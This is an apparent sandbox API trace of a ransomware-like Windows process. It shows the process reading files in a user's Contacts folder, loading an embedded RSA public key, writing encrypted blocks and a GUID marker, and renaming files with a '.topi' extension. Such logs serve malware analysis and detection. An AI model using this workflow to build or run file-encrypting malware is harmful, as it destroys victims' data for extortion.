SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.344] SetLastError (dwErrCode=0x0) [0093.344] GetLastError () returned 0x0 [0093.345] SetLastError (dwErrCode=0x0) [0093.345] GetLastError () returned 0x0 [0093.345] SetLastError (dwErrCode=0x0) [0093.345] GetLastError () returned 0x0 [0093.345] SetLastError (dwErrCode=0x0) [0093.345] GetLastError () returned 0x0 [0093.345] SetLastError (dwErrCode=0x0) [0093.345] GetLastError () returned 0x0 [0093.345] SetLastError (dwErrCode=0x0) [0093.345] CryptDestroyHash (hHash=0x31c7580) returned 1 [0093.345] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0093.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3193e68 | out: hHeap=0x680000) returned 1 [0093.345] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0093.345] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0093.345] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0093.345] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.345] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0093.346] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x493, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.346] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0093.346] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0093.346] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0093.346] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0093.346] CloseHandle (hObject=0x6a8) returned 1 [0093.348] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\asdlfk poopvy.contact.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\asdlfk poopvy.contact.topi")) returned 1 [0093.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0093.348] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.348] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0093.350] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0093.350] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eacb1e0, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eacb1e0, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eacb1e0, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x499, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="chucu jadnvk.contact", cAlternateFileName="CHUCUJ~1.CON")) returned 1 [0093.350] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact") returned=".contact" [0093.350] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\chucu jadnvk.contact" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\chucu jadnvk.contact"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0093.351] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=1177) returned 1 [0093.351] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0093.354] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x473, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0093.354] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0093.648] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.648] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.648] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0093.648] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x499, lpOverlapped=0x0) returned 1 [0093.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.648] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0093.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.648] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0093.648] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6deef8) returned 1 [0093.649] CryptCreateHash (in: hProv=0x6deef8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0093.649] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0093.649] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0093.649] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0093.649] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0093.649] GetLastError () returned 0x0 [0093.649] SetLastError (dwErrCode=0x0) [0093.649] GetLastError () returned 0x0 [0093.649] SetLastError (dwErrCode=0x0) [0093.649] GetLastError () returned 0x0 [0093.649] SetLastError (dwErrCode=0x0) [0093.649] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.650] GetLastError () returned 0x0 [0093.650] SetLastError (dwErrCode=0x0) [0093.651] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.651] SetLastError (dwErrCode=0x0) [0093.651] GetLastError () returned 0x0 [0093.652] SetLastError (dwErrCode=0x0) [0093.652] GetLastError () returned 0x0 [0093.652] SetLastError (dwErrCode=0x0) [0093.652] GetLastError () returned 0x0 [0093.652] SetLastError (dwErrCode=0x0) [0093.652] GetLastError () returned 0x0 [0093.652] SetLastError (dwErrCode=0x0) [0093.652] GetLastError () returned 0x0 [0093.652] SetLastError (dwErrCode=0x0) [0093.652] GetLastError () returned 0x0 [0093.652] SetLastError (dwErrCode=0x0) [0093.652] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0093.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0093.652] CryptDestroyHash (hHash=0x31c7580) returned 1 [0093.652] CryptReleaseContext (hProv=0x6deef8, dwFlags=0x0) returned 1 [0093.652] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0093.653] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0093.653] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0093.653] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0093.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4a0) returned 0x31d01f0 [0093.653] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0093.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x3193e68 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x320fab0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175fc0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31bab28 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x3175ea0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x31baf90 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e08 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x31ce620 [0093.653] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x31ce620, Size=0x218) returned 0x3165e90 [0093.653] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d0980 [0093.653] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e08 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8df0 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d8e08 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9c28 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0093.654] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8df0 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e08 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0093.654] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3165e90 | out: hHeap=0x680000) returned 1 [0093.655] GetCurrentThreadId () returned 0x8c4 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x6e1040 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6deef8 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.655] GetCurrentThreadId () returned 0x8c4 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x31bee50 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0093.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0093.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31bee50 | out: hHeap=0x680000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0093.655] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.655] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb568 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0093.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e08 [0093.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0093.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8df0 [0093.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0093.656] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0093.656] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8cd0 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8dc0 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e08 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e08 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x3165e90 [0093.657] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0093.657] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0093.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e08 | out: hHeap=0x680000) returned 1 [0093.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31bc228 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0093.658] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6deef8 | out: hHeap=0x680000) returned 1 [0093.658] HeapFree (in: hHeap=0x680000, dwFlags=0x0, 